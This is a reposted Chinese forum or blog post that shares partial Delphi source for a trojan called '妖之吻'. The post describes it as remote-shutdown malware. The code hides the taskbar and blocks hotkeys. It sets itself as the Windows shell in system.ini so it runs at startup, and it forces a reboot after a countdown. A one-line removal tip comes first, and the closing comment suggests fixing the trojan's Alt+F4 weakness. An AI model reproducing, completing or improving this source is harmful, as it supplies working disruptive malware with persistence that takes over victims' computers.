[转载]妖之吻部分源代码

文章作者：千年老妖

远程关机木马“妖之吻”应该听说过吧， 下面是部分源代码：

(清除方法:system.ini文件的shell值改为explorer.exe)

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Classes,inifiles, Graphics, Controls, Forms, Dialogs

,

StdCtrls, ExtCtrls, Buttons;

type

TForm1 = class(TForm)

Timer1: TTimer;

Label1: TLabel;

Timer2: TTimer;

Label2: TLabel;

SpeedButton1: TSpeedButton;

procedure Timer1Timer(Sender: TObject);

procedure FormCreate(Sender: TObject);

procedure FormClose(Sender: TObject; var Action: TCloseAction);

procedure Timer2Timer(Sender: TObject);

procedure SpeedButton1Click(Sender: TObject);

private

{ Private declarations }

public

{ Public declarations }

end;

var

Form1: TForm1;

implementation

{$R *.DFM}

var

sysini:tinifile;//定一个ini，准备动手术

j,i:integer;

procedure TForm1.Timer1Timer(Sender: TObject);

begin

exitwindowsex(ewx_reboot,0);//倒数时间到，关机罗！

end;

procedure TForm1.FormCreate(Sender: TObject);

var

hregion,wndHandle : THandle;

wndClass : array[0..50] of Char;

k:string;

begin

hregion:=createellipticrgn(14,200,350,14);//想画个不规则窗体

setwindowrgn(handle,hregion,true);

StrPCopy(@wndClass[0], 'Shell_TrayWnd');

wndHandle := FindWindow(@wndClass[0], nil);

ShowWindow(wndHandle, SW_HIDE);

i:=60;

SetWindowLong(Application.Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW);

systemparametersinfo(97,1,nil,0);//屏蔽热键

timer1.Enabled:=false;

sysini:=Tinifile.Create('system.ini');

k:=sysini.ReadString('boot','shell',k);//这里准备做成启动20次恢复，

if (k='explorer') or (k='explorer.exe') then

begin

sysini.WriteInteger('mci','mcicount',20);

sysini.WriteString('boot','shell',application.ExeName);//这里用自己替换掉了shell

end

end;

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);

begin

systemparametersinfo(97,0,nil,0);//取消屏蔽

end;

procedure TForm1.Timer2Timer(Sender: TObject);

begin

i:=i-1;

label2.Caption:=inttostr(i);

if i=1 then

begin

timer2.Enabled:=false;

timer1.Enabled:=true;

j:=sysini.ReadInteger('mci','mcicount',j);

j:=j-1;

if j=1 then

begin

sysini.WriteString('boot','shell','explorer.exe');//当启动满了20次，恢复shell

end;

end;

end;

procedure TForm1.SpeedButton1Click(Sender: TObject);//调试用的

begin

timer1.Enabled:=false;

timer2.Enabled:=false;

application.Terminate;

systemparametersinfo(97,1,nil,0);

end;

end.

还存在个问题，这个程序里面的代码没有屏蔽掉Alt+F4,可以更换成别的办法。